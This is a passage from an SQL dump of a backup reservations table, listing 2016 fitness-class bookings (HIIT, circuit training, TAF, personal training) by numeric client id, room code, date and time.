(7970, 3, 'CTR', '2016-09-30', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(7971, 205, 'CTR', '2016-09-29', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(7972, 209, 'CTR', '2016-09-29', '19h15', '19h45', 'Personal Training'),
(7973, 92, 'CTR', '2016-09-30', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(7974, 92, 'CTR', '2016-09-30', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(7976, 48, 'CTR', '2016-09-30', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(7977, 48, 'CTR', '2016-09-30', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(7978, 248, 'CTR', '2016-10-03', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(7979, 231, 'CTR', '2016-10-03', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(7980, 188, 'CTR', '2016-10-03', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(7981, 188, 'CTR', '2016-10-03', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(7982, 188, 'CTR', '2016-10-03', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(7983, 48, 'CTR', '2016-10-03', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(7984, 48, 'CTR', '2016-10-03', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8052, 132, 'CTR', '2016-10-10', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8051, 132, 'CTR', '2016-10-07', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(7987, 180, 'CTR', '2016-10-03', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(7988, 180, 'CTR', '2016-10-03', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8039, 138, 'CTR', '2016-10-05', '18h15', '18h45', 'Circuit Training'),
(8049, 249, 'CTR', '2016-10-03', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8050, 249, 'CTR', '2016-10-03', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(7993, 80, 'CTR', '2016-10-03', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(7994, 80, 'CTR', '2016-10-03', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(7995, 180, 'CTR', '2016-10-05', '20h30', '21h00', 'Circuit Training'),
(7996, 3, 'CTR', '2016-10-05', '20h30', '21h00', 'Circuit Training'),
(7997, 173, 'CTR', '2016-10-05', '20h30', '21h00', 'Circuit Training'),
(7998, 247, 'CTR', '2016-10-05', '20h30', '21h00', 'Circuit Training'),
(8000, 60, 'CTR', '2016-10-05', '20h30', '21h00', 'Circuit Training'),
(8056, 192, 'CTR', '2016-10-07', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8003, 196, 'CTR', '2016-10-12', '20h30', '21h00', 'Circuit Training'),
(8064, 231, 'CTR', '2016-10-10', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8005, 28, 'CTR', '2016-09-29', '12h45', '13h15', 'Circuit Training'),
(8006, 28, 'CTR', '2016-09-29', '12h45', '13h15', 'Circuit Training'),
(8007, 199, 'CTR', '2016-09-29', '12h45', '13h15', 'Circuit Training'),
(8008, 205, 'CTR', '2016-09-29', '12h45', '13h15', 'Circuit Training'),
(8009, 189, 'CTR', '2016-09-29', '12h45', '13h15', 'Circuit Training'),
(8010, 192, 'CTR', '2016-09-30', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8011, 192, 'CTR', '2016-09-30', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8012, 191, 'CTR', '2016-10-03', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8013, 228, 'CTR', '2016-10-03', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8066, 188, 'CTR', '2016-10-10', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8063, 248, 'CTR', '2016-10-10', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8021, 193, 'CTR', '2016-10-10', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8022, 193, 'CTR', '2016-10-10', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8023, 193, 'CTR', '2016-10-05', '18h15', '18h45', 'Circuit Training'),
(8065, 188, 'CTR', '2016-10-10', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8029, 80, 'CTR', '2016-10-05', '18h15', '18h45', 'Circuit Training'),
(8030, 240, 'CTR', '2016-10-06', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(8031, 48, 'CTR', '2016-10-05', '18h15', '18h45', 'Circuit Training'),
(8032, 48, 'CTR', '2016-10-05', '19h ', '19h30', 'Circuit training'),
(8033, 233, 'CTR', '2016-10-05', '20h30', '21h00', 'Circuit Training'),
(8034, 220, 'CTR', '2016-10-05', '19h45', '20h15', 'Personal Training'),
(8035, 205, 'CTR', '2016-10-06', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(8037, 205, 'CTR', '2016-10-05', '18h15', '18h45', 'Circuit Training'),
(8038, 205, 'CTR', '2016-10-05', '19h ', '19h30', 'Circuit training'),
(8042, 180, 'CTR', '2016-10-07', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8043, 3, 'CTR', '2016-10-07', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8044, 3, 'CTR', '2016-10-07', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8045, 48, 'CTR', '2016-10-07', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8046, 48, 'CTR', '2016-10-07', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8047, 92, 'CTR', '2016-10-07', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8048, 92, 'CTR', '2016-10-07', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8053, 31, 'CTR', '2016-10-07', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8054, 31, 'CTR', '2016-10-07', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8055, 228, 'CTR', '2016-10-10', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8057, 192, 'CTR', '2016-10-07', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8058, 230, 'CTR', '2016-10-10', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8059, 230, 'CTR', '2016-10-10', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8060, 230, 'CTR', '2016-10-13', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(8061, 240, 'CTR', '2016-10-12', '18h15', '18h45', 'Circuit Training'),
(8062, 240, 'CTR', '2016-10-13', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(8067, 188, 'CTR', '2016-10-10', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8068, 132, 'CTR', '2016-10-10', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8069, 180, 'CTR', '2016-10-10', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8070, 180, 'CTR', '2016-10-10', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8093, 28, 'CTR', '2016-10-13', '12h45', '13h15', 'Circuit Training'),
(8102, 180, 'CTR', '2016-10-14', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8073, 249, 'CTR', '2016-10-10', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8074, 249, 'CTR', '2016-10-10', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8075, 48, 'CTR', '2016-10-12', '18h15', '18h45', 'Circuit Training'),
(8076, 48, 'CTR', '2016-10-12', '19h ', '19h30', 'Circuit training'),
(8077, 80, 'CTR', '2016-10-12', '18h15', '18h45', 'Circuit Training'),
(8078, 31, 'CTR', '2016-10-12', '18h15', '18h45', 'Circuit Training'),
(8079, 205, 'CTR', '2016-10-12', '18h15', '18h45', 'Circuit Training'),
(8080, 205, 'CTR', '2016-10-12', '19h ', '19h30', 'Circuit training'),
(8081, 180, 'CTR', '2016-10-12', '20h30', '21h00', 'Circuit Training'),
(8082, 173, 'CTR', '2016-10-12', '20h30', '21h00', 'Circuit Training'),
(8083, 247, 'CTR', '2016-10-12', '20h30', '21h00', 'Circuit Training'),
(8526, 248, 'CTR', '2016-12-12', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8085, 251, 'CTR', '2016-10-12', '20h30', '21h00', 'Circuit Training'),
(8087, 31, 'CTR', '2016-10-12', '19h ', '19h30', 'Circuit training'),
(8089, 48, 'CTR', '2016-10-10', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8090, 205, 'CTR', '2016-10-10', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8091, 205, 'CTR', '2016-10-10', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8094, 28, 'CTR', '2016-10-13', '12h45', '13h15', 'Circuit Training'),
(8095, 199, 'CTR', '2016-10-13', '12h45', '13h15', 'Circuit Training'),
(8096, 205, 'CTR', '2016-10-13', '12h45', '13h15', 'Circuit Training'),
(8097, 189, 'CTR', '2016-10-13', '12h45', '13h15', 'Circuit Training'),
(8098, 224, 'CTR', '2016-10-13', '12h45', '13h15', 'Circuit Training'),
(8099, 205, 'CTR', '2016-10-13', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(8100, 209, 'CTR', '2016-10-13', '19h15', '19h45', 'Personal Training'),
(8101, 213, 'CTR', '2016-10-11', '19h15', '19h45', 'Duo Training'),
(8103, 180, 'CTR', '2016-10-14', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8104, 205, 'CTR', '2016-10-14', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8105, 205, 'CTR', '2016-10-14', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8106, 92, 'CTR', '2016-10-14', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8107, 92, 'CTR', '2016-10-14', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8141, 230, 'CTR', '2016-10-17', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8109, 48, 'CTR', '2016-10-14', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8110, 48, 'CTR', '2016-10-14', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8136, 31, 'CTR', '2016-10-19', '18h15', '18h45', 'Circuit Training'),
(8112, 48, 'CTR', '2016-10-17', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8113, 48, 'CTR', '2016-10-17', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8114, 228, 'CTR', '2016-10-17', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8115, 248, 'CTR', '2016-10-17', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8116, 188, 'CTR', '2016-10-17', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8117, 188, 'CTR', '2016-10-17', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8118, 231, 'CTR', '2016-10-17', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8119, 205, 'CTR', '2016-10-17', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8120, 205, 'CTR', '2016-10-17', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8140, 132, 'CTR', '2016-10-17', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8139, 132, 'CTR', '2016-10-17', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8123, 213, 'CTR', '2016-10-18', '19h15', '19h45', 'Duo Training'),
(8124, 173, 'CTR', '2016-10-19', '20h30', '21h00', 'Circuit Training'),
(8125, 60, 'CTR', '2016-10-19', '20h30', '21h00', 'Circuit Training'),
(8126, 196, 'CTR', '2016-10-19', '20h30', '21h00', 'Circuit Training'),
(8127, 247, 'CTR', '2016-10-19', '20h30', '21h00', 'Circuit Training'),
(8214, 251, 'CTR', '2016-10-26', '20h30', '21h00', 'Circuit Training'),
(8130, 220, 'CTR', '2016-10-19', '19h45', '20h15', 'Personal Training'),
(8134, 210, 'CTR', '2016-10-17', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8132, 240, 'CTR', '2016-10-19', '18h15', '18h45', 'Circuit Training'),
(8149, 80, 'CTR', '2016-10-19', '20h30', '21h00', 'Circuit Training'),
(8135, 80, 'CTR', '2016-10-17', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8137, 31, 'CTR', '2016-10-19', '19h ', '19h30', 'Circuit training'),
(8138, 140, 'CTR', '2016-10-19', '18h15', '18h45', 'Circuit Training'),
(8142, 230, 'CTR', '2016-10-17', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8143, 48, 'CTR', '2016-10-19', '18h15', '18h45', 'Circuit Training'),
(8144, 48, 'CTR', '2016-10-19', '19h ', '19h30', 'Circuit training'),
(8145, 193, 'CTR', '2016-10-24', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8146, 193, 'CTR', '2016-10-24', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8147, 193, 'CTR', '2016-10-31', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8148, 193, 'CTR', '2016-10-31', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8150, 28, 'CTR', '2016-10-20', '12h45', '13h15', 'Circuit Training'),
(8200, 235, 'CTR', '2016-10-31', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8152, 199, 'CTR', '2016-10-20', '12h45', '13h15', 'Circuit Training'),
(8153, 189, 'CTR', '2016-10-20', '12h45', '13h15', 'Circuit Training'),
(8154, 205, 'CTR', '2016-10-20', '12h45', '13h15', 'Circuit Training'),
(8155, 188, 'CTR', '2016-10-20', '12h45', '13h15', 'Circuit Training'),
(8156, 50, 'CTR', '2016-10-21', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8157, 50, 'CTR', '2016-10-21', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8182, 192, 'CTR', '2016-10-21', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8181, 192, 'CTR', '2016-10-21', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8216, 80, 'CTR', '2016-10-24', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8162, 3, 'CTR', '2016-10-28', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8163, 3, 'CTR', '2016-10-28', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8164, 180, 'CTR', '2016-10-28', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8165, 180, 'CTR', '2016-10-28', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8166, 50, 'CTR', '2016-10-28', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8167, 50, 'CTR', '2016-10-28', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8224, 92, 'CTR', '2016-11-04', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8225, 92, 'CTR', '2016-11-04', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8170, 48, 'CTR', '2016-10-21', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8171, 48, 'CTR', '2016-10-21', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8172, 48, 'CTR', '2016-10-28', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8173, 48, 'CTR', '2016-10-28', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8240, 189, 'CTR', '2016-10-27', '12h45', '13h15', 'Circuit Training'),
(8241, 188, 'CTR', '2016-10-27', '12h45', '13h15', 'Circuit Training'),
(8176, 205, 'CTR', '2016-10-20', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(8480, 230, 'CTR', '2016-12-01', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(8178, 31, 'CTR', '2016-10-21', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8179, 31, 'CTR', '2016-10-21', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8180, 210, 'CTR', '2016-10-20', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(8183, 249, 'CTR', '2016-10-24', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8184, 249, 'CTR', '2016-10-24', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8185, 230, 'CTR', '2016-10-24', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8186, 230, 'CTR', '2016-10-24', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8187, 48, 'CTR', '2016-10-24', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8188, 48, 'CTR', '2016-10-24', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8189, 132, 'CTR', '2016-10-24', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8190, 132, 'CTR', '2016-10-24', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8191, 205, 'CTR', '2016-10-24', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8192, 205, 'CTR', '2016-10-24', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8193, 205, 'CTR', '2016-10-21', '17h30', '18h00', 'Circuit Training'),
(8194, 213, 'CTR', '2016-10-25', '19h15', '19h45', 'Duo Training'),
(8195, 248, 'CTR', '2016-10-24', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8196, 235, 'CTR', '2016-10-24', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8197, 188, 'CTR', '2016-10-24', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8198, 228, 'CTR', '2016-10-24', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8199, 231, 'CTR', '2016-10-24', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8201, 230, 'CTR', '2016-10-27', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(8202, 60, 'CTR', '2016-10-26', '20h30', '21h00', 'Circuit Training'),
(8203, 180, 'CTR', '2016-10-26', '20h30', '21h00', 'Circuit Training'),
(8204, 247, 'CTR', '2016-10-26', '20h30', '21h00', 'Circuit Training'),
(8527, 231, 'CTR', '2016-12-12', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8206, 80, 'CTR', '2016-10-26', '20h30', '21h00', 'Circuit Training'),
(8207, 196, 'CTR', '2016-10-26', '20h30', '21h00', 'Circuit Training'),
(8208, 188, 'CTR', '2016-10-26', '20h30', '21h00', 'Circuit Training'),
(8227, 31, 'CTR', '2016-10-28', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8226, 31, 'CTR', '2016-10-28', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8228, 205, 'CTR', '2016-10-27', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(8218, 168, 'CTR', '2016-10-26', '19h ', '19h30', 'Circuit training'),
(8250, 48, 'CTR', '2016-10-31', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8221, 138, 'CTR', '2016-10-26', '18h15', '18h45', 'Circuit Training'),
(8242, 205, 'CTR', '2016-10-27', '12h45', '13h15', 'Circuit Training'),
(8238, 192, 'CTR', '2016-10-28', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8239, 209, 'CTR', '2016-10-27', '19h15', '19h45', 'Personal Training'),
(8234, 205, 'CTR', '2016-10-26', '18h15', '18h45', 'Circuit Training'),
(8235, 220, 'CTR', '2016-10-26', '19h45', '20h15', 'Personal Training'),
(8236, 231, 'CTR', '2016-10-26', '18h15', '18h45', 'Circuit Training'),
(8237, 252, 'CTR', '2016-10-26', '20h30', '21h00', 'Circuit Training'),
(8249, 48, 'CTR', '2016-10-31', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8246, 138, 'CTR', '2016-10-31', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8247, 138, 'CTR', '2016-10-31', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8248, 168, 'CTR', '2016-11-02', '19h ', '19h30', 'Circuit training'),
(8251, 235, 'CTR', '2016-11-07', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8252, 193, 'CTR', '2016-11-07', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8253, 193, 'CTR', '2016-11-07', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8279, 180, 'CTR', '2016-11-09', '20h30', '21h00', 'Circuit Training'),
(8259, 60, 'CTR', '2016-11-02', '20h30', '21h00', 'Circuit Training'),
(8262, 205, 'CTR', '2016-11-02', '19h ', '19h30', 'Circuit training'),
(8257, 188, 'CTR', '2016-11-02', '20h30', '21h00', 'Circuit Training'),
(8258, 188, 'CTR', '2016-11-02', '20h30', '21h00', 'Circuit Training'),
(8261, 252, 'CTR', '2016-11-02', '20h30', '21h00', 'Circuit Training'),
(8276, 193, 'CTR', '2016-11-09', '19h ', '19h30', 'Circuit training'),
(8264, 231, 'CTR', '2016-11-02', '18h15', '18h45', 'Circuit Training'),
(8265, 180, 'CTR', '2016-11-02', '18h15', '18h45', 'Circuit Training'),
(8315, 48, 'CTR', '2016-11-09', '18h15', '18h45', 'Circuit Training'),
(8267, 180, 'CTR', '2016-11-04', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8268, 180, 'CTR', '2016-11-04', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8269, 50, 'CTR', '2016-11-04', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8270, 50, 'CTR', '2016-11-04', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8271, 48, 'CTR', '2016-11-04', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8272, 48, 'CTR', '2016-11-04', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)');
INSERT INTO `reservation_reservation_bck` (`id`, `id_client`, `id_salle`, `date`, `heure_deb`, `heure_fin`, `type_seance`) VALUES
(8273, 31, 'CTR', '2016-11-04', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8274, 31, 'CTR', '2016-11-04', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8277, 193, 'CTR', '2016-11-14', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8278, 193, 'CTR', '2016-11-14', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8319, 138, 'CTR', '2016-11-14', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8281, 173, 'CTR', '2016-11-09', '20h30', '21h00', 'Circuit Training'),
(8282, 60, 'CTR', '2016-11-09', '20h30', '21h00', 'Circuit Training'),
(8284, 247, 'CTR', '2016-11-09', '20h30', '21h00', 'Circuit Training'),
(8285, 188, 'CTR', '2016-11-09', '20h30', '21h00', 'Circuit Training'),
(8286, 192, 'CTR', '2016-11-04', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8347, 132, 'CTR', '2016-11-11', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8288, 220, 'CTR', '2016-11-09', '19h45', '20h15', 'Personal Training'),
(8289, 248, 'CTR', '2016-11-07', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8290, 231, 'CTR', '2016-11-07', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8291, 188, 'CTR', '2016-11-07', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8292, 140, 'CTR', '2016-11-07', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8293, 138, 'CTR', '2016-11-07', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8294, 138, 'CTR', '2016-11-07', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8295, 48, 'CTR', '2016-11-07', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8296, 48, 'CTR', '2016-11-07', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8297, 228, 'CTR', '2016-11-07', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8298, 210, 'CTR', '2016-11-07', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8299, 210, 'CTR', '2016-11-07', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8300, 138, 'CTR', '2016-11-09', '18h15', '18h45', 'Circuit Training'),
(8301, 188, 'CTR', '2016-11-07', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8302, 255, 'CTR', '2016-11-07', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8303, 249, 'CTR', '2016-11-07', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8304, 249, 'CTR', '2016-11-07', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8305, 132, 'CTR', '2016-11-07', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8306, 132, 'CTR', '2016-11-07', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8307, 256, 'CTR', '2016-11-07', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8308, 256, 'CTR', '2016-11-07', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8309, 205, 'CTR', '2016-11-07', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8310, 205, 'CTR', '2016-11-07', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8311, 180, 'CTR', '2016-11-07', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8312, 180, 'CTR', '2016-11-07', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8313, 230, 'CTR', '2016-11-07', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8314, 230, 'CTR', '2016-11-07', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8316, 48, 'CTR', '2016-11-09', '19h ', '19h30', 'Circuit training'),
(8317, 31, 'CTR', '2016-11-09', '18h15', '18h45', 'Circuit Training'),
(8318, 31, 'CTR', '2016-11-09', '19h ', '19h30', 'Circuit training'),
(8320, 138, 'CTR', '2016-11-14', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8321, 230, 'CTR', '2016-11-14', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8322, 230, 'CTR', '2016-11-14', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8323, 249, 'CTR', '2016-11-14', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8324, 249, 'CTR', '2016-11-14', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8325, 132, 'CTR', '2016-11-14', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8326, 132, 'CTR', '2016-11-14', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8327, 205, 'CTR', '2016-11-14', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8328, 205, 'CTR', '2016-11-14', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8329, 48, 'CTR', '2016-11-14', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8330, 48, 'CTR', '2016-11-14', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8331, 256, 'CTR', '2016-11-14', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8332, 256, 'CTR', '2016-11-14', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8333, 248, 'CTR', '2016-11-14', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8409, 48, 'CTR', '2016-11-21', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8335, 231, 'CTR', '2016-11-14', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8341, 230, 'CTR', '2016-11-10', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(8337, 188, 'CTR', '2016-11-14', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8338, 188, 'CTR', '2016-11-14', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8361, 180, 'CTR', '2016-11-16', '20h30', '21h00', 'Circuit Training'),
(8340, 255, 'CTR', '2016-11-14', '17h30', '18h00', 'Circuit Training (orienté course à pied)'),
(8342, 230, 'CTR', '2016-11-11', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8343, 230, 'CTR', '2016-11-11', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8345, 205, 'CTR', '2016-11-10', '18h30', '19h00', 'TAF (Taille-Abdos-Fessiers)'),
(8348, 132, 'CTR', '2016-11-11', '18h45', '19h15', 'HIIT Partie 2 (avec cardio)'),
(8349, 233, 'CTR', '2016-11-09', '20h30', '21h00', 'Circuit Training'),
(8350, 188, 'CTR', '2016-11-09', '20h30', '21h00', 'Circuit Training'),
(8351, 205, 'CTR', '2016-11-09', '19h ', '19h30', 'Circuit training'),
(8410, 256, 'CTR', '2016-11-21', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
(8353, 50, 'CTR', '2016-11-11', '18h15', '18h45', 'HIIT Partie 1 (avec cardio)'),
